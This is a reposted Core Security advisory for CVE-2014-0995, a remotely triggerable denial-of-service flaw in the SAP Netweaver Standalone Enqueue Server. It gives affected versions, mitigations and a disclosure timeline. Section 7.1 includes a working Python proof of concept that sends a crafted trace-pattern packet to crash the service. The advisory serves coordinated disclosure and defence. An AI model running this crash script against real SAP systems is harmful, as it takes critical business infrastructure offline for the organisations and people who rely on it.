扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 |
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability 1. **Advisory Information** Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability Advisory ID: CORE-2014-0007 Advisory URL: http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability Date published: 2014-10-15 Date of last update: 2014-10-15 Vendors contacted: SAP Release mode: Coordinated release 2. **Vulnerability Information*** * Class: Uncontrolled Recursion [CWE-674] Impact: Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2014-0995 3. **Vulnerability Description** SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. A vulnerability has been found in SAP Netweaver that could allow an unauthenticated, remote attacker to create denial of service conditions. The vulnerability is triggered by sending a specially crafted SAP Enqueue Server packet to remote TCP port 32NN (NN being the SAP system number) of a host running the "Standalone Enqueue Server" service, part of SAP Netweaver Application Server ABAP/Java. The "Standalone Enqueue Server" is a critical component of a SAP Netweaver installation in terms of availability, rendering the whole SAP system unresponsive. 4. **Vulnerable Packages** . SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503). . SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869). Other versions are probably affected too, but they were not checked. 5. **Vendor Information, Solutions and Workarounds** Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: Restrict access to the Standalone Enqueue service by configuring Access Control Lists [4] and to the Standalone Enqueue Service TCP port 32XX (XX is the instance number). SAP published a security note [3] with the fix. 6. **Credits** This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Advisories Team. 7. **Technical Description / Proof of Concept Code** When the trace level of the service is configured to stop logging when a pattern is found [2], the service does not properly control the amount of recursion resulting in a stack overflow exception. The vulnerability can be triggered remotely by setting the trace level with a wildcard Trace Pattern. This vulnerability could allow a remote, unauthenticated attacker to conduct a denial of service attack against the vulnerable systems, rendering the Enqueue Server unavailable. The following python code can be used to trigger the vulnerability: 7.1. **Proof of Concept** /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) # Connect print "[*] Connecting to", options.hostname, "port", options.port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) print "[*] Sending crash packet" crash = '\xab\xcd\xe1\x23'# Magic bytes crash+= '\x00\x00\x00\x00'# Id crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b'# Packet/frag length crash+= '\x03\x00\x00\x00'# Destination/Opcode/MoreFrags/Type crash+= 'ENC\x00'# Admin Eye-catcher crash+= '\x01\x00\x00\x00'# Version crash+= '#EAA'# Admin Eye-catcher crash+= '\x01\x00\x00\x00\x00'# Len crash+= '\x06\x00\x00\x00\x00\x00'# Opcode/Flags/RC crash+= '#EAE'# Admin Eye-catcher crash+= '\x01\x04\x00\x00'# Version/Action/Limit/Tread crash+= '\x00\x00\x00\x00' crash+= '\x00\x00\x00\x03\x00\x00\x00\x03'# Trace Level crash+= '\x01'# Logging crash+= '\x01\x40\x00\x00'# Max file size crash+= '\x00\x00\x00\x01\x00\x00\x00\x01'# No. patterns crash+= '\x00\x00\x00\x25#EAH'# Trace Eye-catcher crash+= '\x01*\x00'# Trace Pattern crash+= '#EAD'# Trace Eye-catcher send_packet(connection, crash) print "[*] Crash sent !" -----/ 8. **Report Timeline** . 2014-06-02: Initial notification sent to SAP, including technical description to reproduce the vulnerability. Publication date set to Jun 30, 2014. . 2014-06-03: Vendor notifies that the tracking number 1153917-2014 was created for this issue. . 2014-06-26: Core Security requests SAP to inform the status of the advisory. . 2014-06-30: The vendor informs they were not able to reproduce the issue and they request additional details and a proof of concept. . 2014-06-30: Core Security sends SAP a full description of the vulnerability including a python script to trigger it. . 2014-07-11: Core Security asks if the vendor was able to trigger the vulnerability. Additinally we requested to set a publication date for the advisory based on the release of a fix. . 2014-07-14: The vendor informs they were able to reproduce the issue but they will not be able to provide a timeline for the fix at the time. They inform they will work with high priority on it and will inform us of the planned fix release date. . 2014-08-12: Core Security asks if the vendor was able to develop a fix and if they have a possible timeline for its availability. . 2014-08-13: The vendor informs that the fix is undergoing quality checks. They also inform that they can't provide an exact date of publication yet. They also request a 3 months grace period once the patch is available. . 2014-08-13: Core Security informs SAP that after we get notice that the fix is available to the public we will publish the advisory accordingly and will not wait for the 3 months of grace as requested because that's not our proceeding policy. . 2014-08-18: The vendor informs that the fix is going to be released with the October patch day, on Tuesday the 14th, of 2014. . 2014-10-14: The vendor publishes the fix under the security note 2042845. . 2014-10-15: Core Security releases the advisory. 9. **References** [1] http://www.sap.com/platform/netweaver/index.epx. [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm [3] SAP security note 2042845 [4] https://websmp230.sap-ag.de/sap/support/notes/1495075. 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. **About Core Security** Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. **Disclaimer** The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. **PGP/GPG Keys** This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. |
体验盒子
